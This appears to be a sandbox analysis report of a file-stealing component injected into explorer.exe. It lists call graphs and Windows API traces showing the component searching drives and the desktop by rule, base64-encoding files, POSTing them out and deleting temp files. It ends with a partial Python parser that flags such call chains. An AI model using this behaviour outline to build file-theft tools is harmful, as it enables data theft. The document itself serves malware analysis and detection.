9630->9632 
9631 30c4c4e 9631->9601 9632->9631 9634->9628 9635->9629 9636->9630 9638 30c88fa _free 55 API calls 9637->9638 9639 30c7624 9638->9639 9639->9626 9642 30c2cb5 9640->9642 9641 30c250e 3 API calls 9641->9642 9642->9641 9643 30c2d87 9642->9643 9644 30c260f 3 API calls 9642->9644 9645 30c390e 2 API calls 9642->9645 9643->9535 9644->9642 9645->9642 9648 30c2ef0 9646->9648 9665 30c2ee8 9646->9665 9647 30c2f51 9649 30c2f6c 9647->9649 9651 30c2c90 5 API calls 9647->9651 9648->9647 9650 30c2c90 5 API calls 9648->9650 9648->9665 9652 30c4be8 55 API calls 9649->9652 9653 30c2f90 9649->9653 9650->9648 9651->9649 9652->9653 9654 30c2451 2 API calls 9653->9654 9657 30c303b 9653->9657 9655 30c2fd1 9654->9655 9656 30c2451 2 API calls 9655->9656 9655->9657 9658 30c2fe7 9656->9658 9662 30c326a 9657->9662 9657->9665 9666 30c23bb 9657->9666 9658->9657 9659 30c2451 2 API calls 9658->9659 9660 30c3015 9659->9660 9660->9657 9661 30c2451 2 API calls 9660->9661 9661->9657 9663 30c88fa _free 55 API calls 9662->9663 9663->9665 9665->9455 9667 30c23d2 9666->9667 9669 30c23cd 9666->9669 9671 30c23dd 9667->9671 9672 30c236c 9667->9672 9669->9662 9670 30c236c 55 API calls 9670->9671 9671->9669 9671->9670 9673 30cae3b _malloc 55 API calls 9672->9673 9674 30c2376 9673->9674 9674->9671 9678 30c32b9 9675->9678 9679 30c32ae 9678->9679 9680 30c32d7 9678->9680 9679->9438 9681 30c329f 60 API calls 9680->9681 9683 30c32e2 9680->9683 9681->9683 9682 30c3b59 3 API calls 9686 30c3335 9682->9686 9683->9682 9684 30c337c 9738 30c23a8 9684->9738 9686->9684 9737 30c390e 2 API calls 9686->9737 9687 30c3b59 3 API calls 9689 30c33cc 9687->9689 9690 30c2451 2 API calls 9689->9690 9691 30c33e4 9690->9691 9692 30c3693 _strlen 9691->9692 9693 30c2451 2 API calls 9691->9693 9697 30c2451 2 API calls 9692->9697 9702 30c36bf 9692->9702 9695 30c33fd 9693->9695 9694 30c2451 2 API calls 9696 30c358e 9694->9696 9695->9692 9698 30c2451 2 API calls 9695->9698 9696->9692 9699 30c2451 2 API calls 9696->9699 9697->9702 9700 30c3415 
9698->9700 9701 30c35ae 9699->9701 9700->9692 9704 30c2451 2 API calls 9700->9704 9701->9692 9703 30c2451 2 API calls 9701->9703 9705 30c370a 9702->9705 9708 30c88fa _free 55 API calls 9702->9708 9710 30c35ce 9703->9710 9707 30c342e 9704->9707 9706 30c88fa _free 55 API calls 9705->9706 9706->9679 9707->9692 9709 30c2451 2 API calls 9707->9709 9708->9705 9711 30c344b 9709->9711 9710->9692 9712 30c2451 2 API calls 9710->9712 9711->9692 9713 30c2451 2 API calls 9711->9713 9716 30c3608 9712->9716 9714 30c3468 9713->9714 9714->9692 9715 30c2451 2 API calls 9714->9715 9717 30c348a 9715->9717 9716->9692 9718 30c2451 2 API calls 9716->9718 9717->9692 9720 30c2451 2 API calls 9717->9720 9719 30c3646 9718->9719 9719->9692 9721 30c2451 2 API calls 9719->9721 9722 30c34ac 9720->9722 9725 30c365c 9721->9725 9722->9692 9723 30c2451 2 API calls 9722->9723 9724 30c34c6 9723->9724 9724->9692 9727 30c2451 2 API calls 9724->9727 9725->9692 9726 30c2451 2 API calls 9725->9726 9726->9692 9728 30c34f0 9727->9728 9728->9692 9729 30c2451 2 API calls 9728->9729 9730 30c350c 9729->9730 9730->9692 9731 30c2451 2 API calls 9730->9731 9732 30c3529 9731->9732 9732->9692 9733 30c2451 2 API calls 9732->9733 9734 30c3553 9733->9734 9734->9692 9735 30c2451 2 API calls 9734->9735 9736 30c3572 9735->9736 9736->9692 9736->9694 9737->9686 9741 30c238a 9738->9741 9742 30c238e 9741->9742 9744 30c239e 9741->9744 9743 30c88fa _free 55 API calls 9742->9743 9742->9744 9743->9742 9744->9687 9744->9736 8390 30c16ea ReadFile 8391 30c174c 8390->8391 8392 30c170e 8390->8392 8420 30c1011 8391->8420 8392->8391 8402 30c1221 8392->8402 8400 30c1745 8401 30c1011 ___DllMainCRTStartup 3 API calls 8400->8401 8401->8391 8403 30c1261 8402->8403 8404 30c1232 CryptBinaryToStringA 8402->8404 8403->8391 8408 30c15f1 8403->8408 8404->8403 8405 30c1245 8404->8405 8425 30c1000 GetProcessHeap RtlAllocateHeap 8405->8425 8407 30c1250 CryptBinaryToStringA 8407->8403 8409 30c1614 8408->8409 8410 30c1607 lstrlen 8408->8410 8426 30c1000 
GetProcessHeap RtlAllocateHeap 8409->8426 8410->8409 8412 30c161c lstrcat 8413 30c1658 8412->8413 8414 30c1651 lstrcat 8412->8414 8427 30c1342 8413->8427 8414->8413 8417 30c1011 ___DllMainCRTStartup 3 API calls 8418 30c167b 8417->8418 8419 30c105d VirtualFree 8418->8419 8419->8400 8457 30c11c4 VirtualQuery 8420->8457 8423 30c102d CloseHandle DeleteFileW 8424 30c101d GetProcessHeap RtlFreeHeap 8424->8423 8425->8407 8426->8412 8450 30c1000 GetProcessHeap RtlAllocateHeap 8427->8450 8429 30c1366 8451 30c106c lstrlen MultiByteToWideChar 8429->8451 8431 30c1375 8452 30c12b2 RtlZeroMemory 8431->8452 8434 30c13c7 RtlZeroMemory 8437 30c13fc 8434->8437 8435 30c1011 ___DllMainCRTStartup 3 API calls 8436 30c15e6 8435->8436 8436->8417 8438 30c15c9 8437->8438 8454 30c1000 GetProcessHeap RtlAllocateHeap 8437->8454 8438->8435 8440 30c14b8 wsprintfW 8441 30c14d8 8440->8441 8449 30c15b3 8441->8449 8455 30c1000 GetProcessHeap RtlAllocateHeap 8441->8455 8442 30c1011 ___DllMainCRTStartup 3 API calls 8442->8438 8444 30c1546 8445 30c15ac 8444->8445 8456 30c104c VirtualAlloc 8444->8456 8447 30c1011 ___DllMainCRTStartup 3 API calls 8445->8447 8447->8449 8448 30c159c RtlMoveMemory 8448->8445 8449->8442 8450->8429 8451->8431 8453 30c12d4 8452->8453 8453->8434 8453->8438 8454->8440 8455->8444 8456->8448 8458 30c1019 8457->8458 8458->8423 8458->8424

Control-flow Graph

APIs
  • Part of subcall function 030C1000: GetProcessHeap.KERNEL32(00000008,00000208,030C1AB2,?,?), ref: 030C1003
  • Part of subcall function 030C1000: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 030C100A
• GetTempPathW.KERNEL32(00000104,00000000,?,?), ref: 030C1ABE
• GetTempFileNameW.KERNEL32(033D3FE8,00000000,00000000,033D3FE8,?,?), ref: 030C1ACF
• DeleteFileW.KERNEL32(?,?), ref: 030C1ADB
• PathRemoveExtensionW.SHLWAPI(?,?), ref: 030C1AE7
• StrRChrW.SHLWAPI(00000000,0000005C,?,?), ref: 030C1AF6
• CreateDirectoryW.KERNEL32(00000000,?,?), ref: 030C1B10
• GetLogicalDriveStringsW.KERNEL32(00000104,00000000,?,?), ref: 030C1B3F
• GetDriveTypeW.KERNEL32(?,?,?), ref: 030C1B54
• lstrcatW.KERNEL32(00000000,?,?,?), ref: 030C1B7F
• CreateThread.KERNEL32(00000000,00000000,030C1A6A,00000000,00000000,00000000), ref: 030C1BA3
• lstrlenW.KERNEL32(?,?,?), ref: 030C1BAF
• WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF,?,?), ref: 030C1BCA
• CloseHandle.KERNEL32(?,?,?), ref: 030C1BD8
• StrStrIW.SHLWAPI(00000000,%DESKTOP%,?,?), ref: 030C1C4B
• SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 030C1C5A
• PathFindFileNameW.SHLWAPI(00000000,?,?), ref: 030C1C65
• PathAppendW.SHLWAPI(00000000,00000000,?,?), ref: 030C1C6D
• ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00008000,?,?), ref: 030C1C7C
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: Path$File$CreateDriveHeapNameStringsTemp$AllocateAppendCloseDeleteDirectoryEnvironmentExpandExtensionFindFolderHandleLogicalMultipleObjectsProcessRemoveThreadTypeWaitlstrcatlstrlen
• String ID: %DESKTOP%
• API String ID: 825410880-4272197009
• Opcode ID: f8981cf725e5acf11f0910bf6c1dd2c180185c38f8f7fb467d1ce4e42d3d89ac
• Instruction ID: 74bfcc1619a55539bca1cc9905a5e962fe4f1dab225f5148444eef00c1ec1d87
• Opcode Fuzzy Hash: f8981cf725e5acf11f0910bf6c1dd2c180185c38f8f7fb467d1ce4e42d3d89ac
• Instruction Fuzzy Hash: 32519035213390ABC728FF75EC88A6EBBE9EF49751B14451CFD05CA186DB789810CB94

Control-flow Graph

APIs
  • Part of subcall function 030C1000: GetProcessHeap.KERNEL32(00000008,00000208,030C1AB2,?,?), ref: 030C1003
  • Part of subcall function 030C1000: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 030C100A
• lstrcatW.KERNEL32(00000208,00000000,00000000,00000000,?,00000000), ref: 030C192C
• PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 030C193C
• lstrcatW.KERNEL32(00000000,00000000,?,00000000), ref: 030C1947
• PathRemoveFileSpecW.SHLWAPI(00000208,?,00000000), ref: 030C194A
• FindFirstFileExW.KERNEL32(00000000,00000001,?,00000000,00000000,00000002,?,00000000), ref: 030C195E
• lstrcmpiW.KERNEL32(?,?,00000000), ref: 030C1995
• PathCombineW.SHLWAPI(00000410,00000208,?,?,?,00000000), ref: 030C19BC
• PathCombineW.SHLWAPI(?,00000208,?,?,00000000), ref: 030C1A10
• FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 030C1A42
• FindClose.KERNEL32(00000000,?,00000000), ref: 030C1A51
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: Path$CombineFileFind$Heaplstrcat$AllocateCloseFirstNextProcessRemoveSpeclstrcmpi
• String ID: *.*
• API String ID: 1316406203-438819550
• Opcode ID: de5107fe2358f862d634beae506849bc148115a8ccda488e74d1d59d0a9915e8
• Instruction ID: dee8e29754ca9ab939309a6bafc06bf8fc0d70bc3d3172e623525624c997e414
• Opcode Fuzzy Hash: de5107fe2358f862d634beae506849bc148115a8ccda488e74d1d59d0a9915e8
• Instruction Fuzzy Hash: 2F41AD34212345ABC718EF24DC84BAEB7E8FB49250F04491DE95697282DB39E9518B50

Control-flow Graph

APIs
  • Part of subcall function 030C2066: PathCombineW.SHLWAPI(?,033D3FE8,00000000,00000000,?,030C2262,030DBA98,?,00000000,033D3FE8), ref: 030C2088
• FindFirstFileW.KERNEL32(?,?,030DBA98,?,00000000,033D3FE8), ref: 030C2278
• FindNextFileW.KERNEL32(00000000,?), ref: 030C22F9
• FindClose.KERNEL32(00000000), ref: 030C2304
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: Find$File$CloseCombineFirstNextPath
• String ID:
• API String ID: 2248441852-0
• Opcode ID: f316f64bd51b9d29f0d9508eac49b21464a0748791f006bc4304c1d531372ea6
• Instruction ID: 2ee15f2019f2fbc5eb8a85caa0fff83ff12e4ec552fa593065ec9c8aebc30db4
• Opcode Fuzzy Hash: f316f64bd51b9d29f0d9508eac49b21464a0748791f006bc4304c1d531372ea6
• Instruction Fuzzy Hash: 8D112431602259AACF20FB69DD48EFEF7FDAF94200F0805AEEC05D2454DF348A95CA94
APIs
  • Part of subcall function 030C11C4: VirtualQuery.KERNEL32(033D3FE8,030C1019,0000001C,030C1019,00000000,030C1CEB,?,?), ref: 030C11D1
• RtlMoveMemory.NTDLL(00000000,00000001,00000363), ref: 030C1FA6
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000001), ref: 030C1FAF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1675517319-0
                                                                                                                                      • Opcode ID: 71e1d98cd2a2530b351418474a0b02026edc12848a436dc3c948f22b0c39fa8c
                                                                                                                                      • Instruction ID: cd6b76df7626c35c217ff847770fa3119cce679e28aebf6a2c9e2d2eaf18e20b
                                                                                                                                      • Opcode Fuzzy Hash: 71e1d98cd2a2530b351418474a0b02026edc12848a436dc3c948f22b0c39fa8c
                                                                                                                                      • Instruction Fuzzy Hash: AAE09235427390ABC668F770AC58A9E2BDCAB862A1F10852CF8158A0C7CB39844182A0

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C1000: GetProcessHeap.KERNEL32(00000008,00000208,030C1AB2,?,?), ref: 030C1003
                                                                                                                                        • Part of subcall function 030C1000: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 030C100A
                                                                                                                                      • wsprintfA.USER32 ref: 030C1DF6
                                                                                                                                        • Part of subcall function 030C1185: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 030C118F
                                                                                                                                        • Part of subcall function 030C1185: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,00040745,030C1E0A), ref: 030C11A1
                                                                                                                                      • StrStrA.SHLWAPI(00000000,filesearch_rules=), ref: 030C1E1C
                                                                                                                                      • StrStrA.SHLWAPI(-00000011,|:|), ref: 030C1E35
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,-00000011,00000000), ref: 030C1E60
                                                                                                                                      • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 030C1E69
                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00000104), ref: 030C1E94
                                                                                                                                      • StrChrA.SHLWAPI(00000000,0000002C), ref: 030C1E9D
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 030C1EAE
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 030C1ED8
                                                                                                                                      • RtlZeroMemory.NTDLL(00040744), ref: 030C1F5B
                                                                                                                                      • RtlZeroMemory.NTDLL(00040744), ref: 030C1F6C
                                                                                                                                      • Sleep.KERNEL32(000927C0), ref: 030C1F77
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$MoveZero$FileHeap$AllocateComputeCrc32MappingOpenProcessSleepViewwsprintf
                                                                                                                                      • String ID: %s%s$filesearch_rules=$|:|
                                                                                                                                      • API String ID: 1853911042-3453313731
                                                                                                                                      • Opcode ID: b43ef6cb3e200dce3cc93e63aaa7b689868934f183745dddd75c265256cf5db5
                                                                                                                                      • Instruction ID: e143cc2b0cdd4f3fab148fbd91ac3bd40f888b232af5730322b68400370a450b
                                                                                                                                      • Opcode Fuzzy Hash: b43ef6cb3e200dce3cc93e63aaa7b689868934f183745dddd75c265256cf5db5
                                                                                                                                      • Instruction Fuzzy Hash: 2F41A574627381AFD314FF65EC88A2E7BE6EB85780714441CED015F28ADF789811CB61

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C2066: PathCombineW.SHLWAPI(?,033D3FE8,00000000,00000000,?,030C2262,030DBA98,?,00000000,033D3FE8), ref: 030C2088
                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?), ref: 030C2156
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 030C2162
                                                                                                                                      • _memset.LIBCMT ref: 030C217C
                                                                                                                                        • Part of subcall function 030C20C1: FindFirstFileW.KERNEL32(?,?), ref: 030C20D6
                                                                                                                                        • Part of subcall function 030C20C1: FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 030C20EE
                                                                                                                                        • Part of subcall function 030C20C1: FileTimeToDosDateTime.KERNEL32(?,?), ref: 030C20FD
                                                                                                                                        • Part of subcall function 030C20C1: FindClose.KERNEL32(00000000,?,?,?), ref: 030C2104
                                                                                                                                        • Part of subcall function 030C2018: lstrlenW.KERNEL32 ref: 030C2022
                                                                                                                                        • Part of subcall function 030C2018: _malloc.LIBCMT ref: 030C203F
                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?), ref: 030C21C6
                                                                                                                                      • _malloc.LIBCMT ref: 030C21D4
                                                                                                                                        • Part of subcall function 030CAE3B: __FF_MSGBANNER.LIBCMT ref: 030CAE52
                                                                                                                                        • Part of subcall function 030CAE3B: __NMSG_WRITE.LIBCMT ref: 030CAE59
                                                                                                                                        • Part of subcall function 030CAE3B: RtlAllocateHeap.NTDLL(033D0000,00000000,00000001), ref: 030CAE7E
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,0000FFFF,?,00000000), ref: 030C21ED
                                                                                                                                      • _free.LIBCMT ref: 030C2212
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 030C2219
                                                                                                                                      • _free.LIBCMT ref: 030C222F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Time$Close$CreateFindHandle_free_malloc$AllocateCombineDateFirstHeapLocalPathRead_memsetlstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2641817564-0
                                                                                                                                      • Opcode ID: e438cb3ae2cfbb95b75cdf38b1583de5702c6bb82e893a01bf1ef25e5e4a68fe
                                                                                                                                      • Instruction ID: 9cceee276ca67effefa0152d7d8b8133f3224fd15d07b19a5763234924c556d3
                                                                                                                                      • Opcode Fuzzy Hash: e438cb3ae2cfbb95b75cdf38b1583de5702c6bb82e893a01bf1ef25e5e4a68fe
                                                                                                                                      • Instruction Fuzzy Hash: CC31E475612385ABCA20EB29DC48E9F77ECFFC9710F10492CFD55A7180EA34DA15CAA1

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C1000: GetProcessHeap.KERNEL32(00000008,00000208,030C1AB2,?,?), ref: 030C1003
                                                                                                                                        • Part of subcall function 030C1000: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 030C100A
                                                                                                                                        • Part of subcall function 030C106C: lstrlen.KERNEL32 ref: 030C1074
                                                                                                                                        • Part of subcall function 030C106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001), ref: 030C1086
                                                                                                                                        • Part of subcall function 030C12B2: RtlZeroMemory.NTDLL(?,00000018), ref: 030C12C4
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 030C13D1
                                                                                                                                      • wsprintfW.USER32 ref: 030C14C8
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 030C15A6
                                                                                                                                      Strings
                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 030C150A
                                                                                                                                      • Accept: */*Referer: %S, xrefs: 030C14BE
                                                                                                                                      • POST, xrefs: 030C1476
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                      • API String ID: 3833683434-704803497
                                                                                                                                      • Opcode ID: f633c9ce83a800dc79abd365651df1994c075575c95e0c8dafc2628ce7be00cf
                                                                                                                                      • Instruction ID: 774b565f9cd9ba8ef9834e8501ef7be0d31701f50fc54be089ba357dfcee4ffe
                                                                                                                                      • Opcode Fuzzy Hash: f633c9ce83a800dc79abd365651df1994c075575c95e0c8dafc2628ce7be00cf
                                                                                                                                      • Instruction Fuzzy Hash: 6E81997520A381AFD714EF69C884A6FBBE9FF89244F14092DF946C7292DB74C900CB52

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      • to initialize the CRT more than once.This indicates a bug in your application., xrefs: 030E5B4C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030E3000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30e3000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: to initialize the CRT more than once.This indicates a bug in your application.
                                                                                                                                      • API String ID: 0-2233211119
                                                                                                                                      • Opcode ID: 21bc480e10ff5060338bbbfd81e1a0136e81fd4fa35cdbb5a6e910d2053669de
                                                                                                                                      • Instruction ID: d75bb23d1d3da989a296f04b02f35cfd3738348f4ea22c0e5ecff1e95e59e667
                                                                                                                                      • Opcode Fuzzy Hash: 21bc480e10ff5060338bbbfd81e1a0136e81fd4fa35cdbb5a6e910d2053669de
                                                                                                                                      • Instruction Fuzzy Hash: 0F512871B063515FD720CA78CCD06A5B7D4EB43229B1C0F79D5E1CB3C2E7A4940A87A4

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 136ab7899a87cf6f1173380ee5e717d99eb8f284b58f0559d8126294b22d9cbe
                                                                                                                                      • Instruction ID: 09e22eeba841edca59f80a22b596de58f41119d11fb6a71d8b64b63e102612a0
                                                                                                                                      • Opcode Fuzzy Hash: 136ab7899a87cf6f1173380ee5e717d99eb8f284b58f0559d8126294b22d9cbe
                                                                                                                                      • Instruction Fuzzy Hash: 33D1EB79622B419BCB71DF28C544BAFB3EAEF84750B14895CE69A5B780DF34E8418B10

Control-flow Graph
• Graph summary (edge list not reproduced): function at 30c37b0, basic blocks 30c37b0-30c3834; calls 30c371d, 30c3774, 30cd44c and 30cae3b; API calls CreateFileW and wcsncpy
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: CreateFile_mallocwcsncpy
• String ID:
• API String ID: 394119516-0
• Opcode ID: dca97c5332efca55d76623fc1a039b9346291ea93d47d35607d11964aafa900b
• Instruction ID: 3798fca96a218fdba8f0a8a6cd49915aa27fc74a73ea6d928271184b097854d1
• Opcode Fuzzy Hash: dca97c5332efca55d76623fc1a039b9346291ea93d47d35607d11964aafa900b
• Instruction Fuzzy Hash: 3411707A912259BBCF20EBA5CC48DDFFBBDFF49250B0485A9A51497100DB359614CBE0

Control-flow Graph
APIs
• ReadFile.KERNEL32(?,?,?,?,E8014E8D), ref: 030C1704
• CloseHandle.KERNEL32(?,?,?,?,?,E8014E8D), ref: 030C1754
• DeleteFileW.KERNEL32(00000000), ref: 030C175B
  • Part of subcall function 030C1221: CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 030C123B
  • Part of subcall function 030C1221: CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 030C125B
  • Part of subcall function 030C15F1: lstrlen.KERNEL32(?), ref: 030C1608
  • Part of subcall function 030C15F1: lstrcat.KERNEL32(00000002,033F852B), ref: 030C163A
  • Part of subcall function 030C15F1: lstrcat.KERNEL32(0000004E,?), ref: 030C1656
  • Part of subcall function 030C105D: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 030C1065
  • Part of subcall function 030C1011: GetProcessHeap.KERNEL32(00000000,033D3FE8,00000000,030C1CEB,?,?), ref: 030C1020
  • Part of subcall function 030C1011: RtlFreeHeap.NTDLL(00000000,?,?), ref: 030C1027
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: BinaryCryptFileFreeHeapStringlstrcat$CloseDeleteHandleProcessReadVirtuallstrlen
• String ID:
• API String ID: 2581074353-0
• Opcode ID: f4e5a8dda59ed339abe186aaaf881b8bfc1cff3eaebe1023a5bf97cb907cdc74
• Instruction ID: 3c6ec8dcb280a865b25a55fcc3d8fe100f421f2a1874865af65edfb4d6c3e98f
• Opcode Fuzzy Hash: f4e5a8dda59ed339abe186aaaf881b8bfc1cff3eaebe1023a5bf97cb907cdc74
• Instruction Fuzzy Hash: B1014E3A7232805BC71CEB31AC549BF7B9DCFD2211B14051CEC028A143DE2DC40987E1

Control-flow Graph
• Graph summary (edge list not reproduced): function at 30c176f, basic blocks 30c176f-30c17b8; no internal calls; API calls RtlZeroMemory, lstrlenW and SHFileOperationW in block 30c1780-30c17ae
APIs
• RtlZeroMemory.NTDLL(?,0000001E), ref: 030C1786
• lstrlenW.KERNEL32(033D3FE8), ref: 030C1794
• SHFileOperationW.SHELL32(?), ref: 030C17AE
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: FileMemoryOperationZerolstrlen
• String ID:
• API String ID: 2791248854-0
• Opcode ID: aea8685c03e6404f5ccf3fd3f0bb6c272cdca0cdc2f606ea4ce22bdead8fdcf8
• Instruction ID: adba008adeb5911d84fe6308865f4d594625c9e57c8342e4ccb8388e2fce061b
• Opcode Fuzzy Hash: aea8685c03e6404f5ccf3fd3f0bb6c272cdca0cdc2f606ea4ce22bdead8fdcf8
• Instruction Fuzzy Hash: 6FF0C0718132189BDB11EF98D9497DEB7FCEB0D705F000156ED05AB144D77969208BE5
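Two of the listings in this section read naturally as behaviour patterns once the argument values are decoded: the routine at 030C1704-030C175B reads a file, passes it to CryptBinaryToStringA with dwFlags 00000001 (CRYPT_STRING_BASE64 in wincrypt.h) and then calls DeleteFileW, and the routine at 030C1786-030C17AE zeroes a 0x1E-byte buffer before SHFileOperationW, 0x1E (30) being the size of the packed 32-bit SHFILEOPSTRUCTW from shellapi.h. The following Python is an added example, not Joe Sandbox code and not code from the analysed sample: it parses the "APIs" lines exactly as they appear in this report and applies the two rules above to them. The line grammar is inferred from the listings shown here, the rule names and the use of the low byte of dwFlags as the encoding format are assumptions of this example, and the embedded input is copied from the two records above.

```python
"""Parse Joe Sandbox 'APIs' listing lines and flag two call chains.

Added example, not Joe Sandbox code and not the sample's code. The line
grammar is inferred from the listings in this report; the constants come
from the Windows SDK (wincrypt.h, shellapi.h)."""
import re
from dataclasses import dataclass
from typing import List, Optional

CRYPT_STRING_BASE64 = 0x00000001       # wincrypt.h: dwFlags encoding format "base64"
SHFILEOPSTRUCTW_SIZE_X86 = 0x1E        # shellapi.h: packed 32-bit SHFILEOPSTRUCTW is 30 bytes

# "• Func.MODULE(args), ref: ADDR", optionally prefixed by
# "Part of subcall function PARENT:"; LIBCMT entries carry no argument list.
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[Optional[int]]          # int for a hex literal, None for "?"
    ref: int                           # call-site address
    subcall_of: Optional[int] = None   # parent routine when listed as a subcall


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = _LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [] if not raw else [None if a.strip() == "?" else int(a, 16)
                               for a in raw.split(",")]
    sub = m.group("sub")
    return ApiCall(m.group("func"), m.group("mod"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)


def parse_record(text: str) -> List[ApiCall]:
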